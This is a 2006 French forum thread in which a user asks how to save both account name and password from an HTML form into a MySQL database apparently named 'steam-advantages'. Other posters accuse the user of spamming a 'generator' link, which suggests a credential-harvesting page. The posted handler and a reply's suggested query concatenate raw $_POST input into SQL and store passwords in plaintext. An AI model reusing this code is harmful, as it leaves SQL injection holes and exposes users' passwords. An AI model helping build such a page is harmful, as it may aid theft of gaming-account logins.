Votre question

formulaire php/mysql

Tags :
  • Html
  • Programmation
Dernière réponse : dans Programmation
24 Novembre 2006 19:41:46

Bonjour , j'ai un site avec un formulaire et une bdd , la page du formulaire s'appelle appel.php et l'autre qui dit que l'on s'est bien connecte (lorsquon a entre son nom et son pass).

sur appel.php j'ai :


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Document sans titre</title>
<style type="text/css">
<!--
body,td,th {
color: #FFFFFF;
}
body {
background-color: #000000;
}
.Style2 {color: #333333}
.Style3 {
font-size: large;
color: #0099FF;
}
-->
</style>
</head>

<body><form action="test/cible.php" method="post">
<p> </p>
<p><center>
</span>
</center></p>

<p>
<blockquote>Nom de compte :
<input type="text" name="nom" /></p>
<p>Mot de passe : <span class="Style2">...</span>
<input type="password" name="pass" /> </p>
<input type="submit" value="Valider" /></blockquote>
</p>
</form>
</body>
</html>


et dans cible.php a la base j'ai :

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Document sans titre</title>
</head>

<body>
<p>
<?php
if($_POST['pass'])
{
mysql_connect("...","...","..." );
mysql_select_db("steam-advantages" );

mysql_query("INSERT INTO test(pass) VALUES('".$_POST['pass']."')" );

}
else
{
echo "Veuillez remplir tous les champs";
}
?>
</p>
<p>Merci pour votre enregistrement</p>
<p> </p>
</body>
</html>



----> ca fonctionne a la base mais seulement mnt que je viens d'ajouter une zone login , comment faire pour que ca linscrive aussi sur ma bdd cette zone svp? car avec le mot de pass a la base ca va !et ici , j'ai ajoute a la suite le meme code commencant par
{

.
.
.
.
.
.
}

---> ca ne vas pas
Merci

Autres pages sur : formulaire php mysql

24 Novembre 2006 21:52:07

plz ...
Contenus similaires
a c 145 L Programmation
24 Novembre 2006 22:03:43

tu va spammer longtemps toi?
24 Novembre 2006 22:05:40

pourquoi ben c'est un générateur j'ai pas le droit ?
a c 145 L Programmation
24 Novembre 2006 22:06:37

2 posts hors sujet pour citer la même url... non tu n'as pas le droit.

P.S.: tu es le maillon faible, au revoir ©LauLau
24 Novembre 2006 23:00:32

mysql_query("INSERT INTO test(login, pass) VALUES('".$_POST['nom']."', '".$_POST['pass']."')" );

C'est ça que tu veux ?
25 Novembre 2006 02:33:54

tiens ca me rappelle vaguement un autre post ca
25 Novembre 2006 09:11:23

ben meme si il na pas le droit, je le remercie !
Merci a toi florian2a
Tom's guide dans le monde
  • Allemagne
  • Italie
  • Irlande
  • Royaume Uni
  • Etats Unis
Suivre Tom's Guide
Inscrivez-vous à la Newsletter
  • ajouter à twitter
  • ajouter à facebook
  • ajouter un flux RSS